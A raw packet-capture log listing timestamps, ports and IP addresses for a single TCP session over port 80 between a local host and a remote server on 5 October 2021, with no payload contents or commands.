Oct 5, 2021 22:18:05.112421989 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112452030 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112482071 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112744093 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112767935 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112790108 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112807035 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112814903 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112848043 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112854958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.112885952 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.112920046 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113723040 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113748074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113769054 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113789082 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113790989 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113812923 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113833904 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113836050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113858938 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113874912 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113882065 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113902092 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113914013 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113924026 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113945007 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.113956928 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.113965988 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114001989 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.114041090 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.114748955 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114810944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.114811897 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114856958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114878893 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114896059 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114936113 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.114952087 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.114958048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.114981890 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115004063 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115026951 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.115030050 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115053892 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115061045 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.115076065 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115098953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115106106 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.115138054 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.115144014 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.115185976 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.115221977 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.118304968 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.120352030 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.178765059 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.179011106 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291354895 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291394949 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291443110 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291496992 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291527987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291559935 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291591883 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291601896 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291637897 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291644096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291647911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291663885 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291675091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291719913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291750908 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291791916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291793108 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291831970 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291841984 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291846991 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.291857004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.291923046 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292392015 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292445898 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292464018 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292476892 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292509079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292507887 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292531013 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292541981 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292566061 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292592049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292623043 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292639017 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292654991 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292686939 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292701006 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292702913 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292754889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292756081 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292787075 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292809963 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292817116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.292839050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.292889118 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.293853045 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.293888092 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.293940067 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.293983936 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294018984 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294043064 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294056892 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294080973 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294122934 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294142008 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294174910 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294177055 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294207096 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294210911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294230938 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294245958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294261932 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294281006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294317007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294331074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294343948 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294384003 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294389963 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294445992 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294855118 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294886112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294919014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294922113 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294950008 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.294955969 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.294982910 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295008898 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295016050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295072079 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295073986 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295105934 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295146942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295164108 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295166969 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295197964 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295233965 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295234919 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295268059 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295279026 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295284033 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295310020 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.295336008 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.295367956 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296317101 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296350956 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296381950 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296394110 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296422005 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296435118 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296498060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296498060 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296515942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296531916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296561003 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296571970 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296587944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296606064 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296629906 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296663046 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296689987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296705008 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296747923 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296750069 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296782017 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296812057 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.296835899 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.296858072 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.297858953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.297889948 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.297920942 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.297946930 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.297965050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.297975063 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.297977924 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.297995090 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298021078 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298032999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298069954 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298101902 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298110962 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298141003 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298156023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298192024 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298224926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298226118 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298249960 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298254967 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.298278093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.298341036 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.301624060 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.349951029 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.350081921 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474081039 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474138021 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474162102 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474184990 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474220991 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474242926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474270105 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474272013 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474312067 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474314928 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474339008 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474363089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474383116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474396944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474406004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474421024 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474426985 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474440098 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474821091 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474857092 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474885941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474914074 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.474935055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474958897 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474982023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.474991083 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475002050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475003958 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475023031 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475047112 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475060940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475150108 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475174904 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475198030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475212097 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475235939 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475236893 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475260019 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.475281000 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475291014 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475303888 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.475984097 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476723909 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476756096 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476778030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476783991 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476805925 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476820946 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476830959 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476867914 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476878881 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476891041 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476912975 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476913929 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476936102 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476938963 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476954937 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.476974010 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.476979971 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.477015972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.477019072 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.477039099 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.477061987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.477063894 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.477077007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.477303982 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478059053 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478106976 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478115082 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478135109 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478158951 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478161097 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478183031 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478193998 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478221893 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478368044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478410006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478439093 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478462934 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478483915 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478507042 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478509903 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478528976 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.478530884 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478554010 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.478579998 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479453087 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479479074 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479501963 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479526997 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479531050 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479547024 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479549885 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479557037 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479573965 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479585886 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479597092 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479598999 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479619026 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479625940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479640007 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479681015 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479702950 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479724884 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479748011 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479748011 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479763031 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479769945 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479788065 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479792118 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.479805946 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.479834080 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480580091 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480653048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480676889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480700016 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480701923 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480716944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480722904 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480746031 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480751991 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480763912 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480770111 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480789900 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480792999 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480817080 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480818987 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480829954 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480842113 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480864048 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480887890 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:05.480889082 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480900049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:05.480906010 CEST	49169	80	192.168.2.22	101.99.90.118
